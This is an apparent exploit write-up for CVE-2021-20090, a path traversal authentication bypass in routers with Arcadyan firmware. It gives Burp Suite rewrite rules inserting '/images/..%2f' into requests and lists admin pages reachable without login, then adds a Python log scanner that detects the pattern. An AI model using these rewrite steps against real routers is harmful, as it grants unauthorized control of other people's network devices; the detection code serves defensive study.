CVE-2021-20090 Arcadyan Routers Authentication Bypass Vulnerability

Introduction

A path traversal vulnerability in the web interface of routers with Arcadyan firmware (Buffalo, etc.) can be exploited to bypass authentication.

Exploit

1. Open Burp Suite, go to the Proxy > Options tab, and add a Match and Replace rule that removes the path traversal string from the Referer request header.

Match /images/..%2f and replace it with /


2. Add another Match and Replace rule to prefix all URLs with images/..%2f

Match GET / and replace it with GET /images/..%2f


3. Now browse the router web interface pages through the Burp Suite proxy browser. All the request URLs will be automatically modified by the proxy.


Some of the URLs which can be accessed without authentication:
http://targetip
http://targetip/info.html
http://targetip/log_log.html
http://targetip/lan_bridge.html
http://targetip/save_init.html
http://targetip/wireless_band2g.html
http://targetip/ap_password_access_date_ntp.html
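
A defender-side check for this request pattern, as an added example that is not part of the original post: it percent-decodes request targets and Referer values taken from web or proxy logs and flags any that contain a `..` path segment, which covers the `/images/..%2f` prefix used above. The sample requests, the 192.0.2.1 address and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (request target, Referer); not captured traffic.
SAMPLE_REQUESTS = [
    ("/images/logo.png", "http://192.0.2.1/login.html"),
    ("/images/..%2finfo.html", "http://192.0.2.1/"),
    ("/images/..%2Flog_log.html", "http://192.0.2.1/images/..%2finfo.html"),
    ("/images/%2e%2e%2fsave_init.html", ""),
    ("/images/..%252flan_bridge.html", ""),
    ("/info.html", "http://192.0.2.1/index.html"),
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so %2F, %2f and %252f all become '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(target):
    """True if the decoded path (query string dropped) has a '..' segment."""
    path = fully_decode(target.split("?", 1)[0]).replace("\\", "/")
    return ".." in path.split("/")

def classify(target, referer=""):
    """Return the findings for one logged request."""
    findings = []
    if has_traversal(target):
        findings.append("traversal-in-target")
    # The Referer is checked too; it only fires when the client left it unrewritten.
    ref_path = re.sub(r"^[a-z]+://[^/]*", "", referer, flags=re.I)
    if ref_path and has_traversal(ref_path):
        findings.append("traversal-in-referer")
    return findings

def scan(requests):
    """Return (target, findings) for every request with at least one finding."""
    results = [(target, classify(target, referer)) for target, referer in requests]
    return [(target, findings) for target, findings in results if findings]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS):
        print(target, findings)
```

Because the Referer may be rewritten before the request is sent, the request-target check is the one to alert on; the Referer finding is supplementary.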
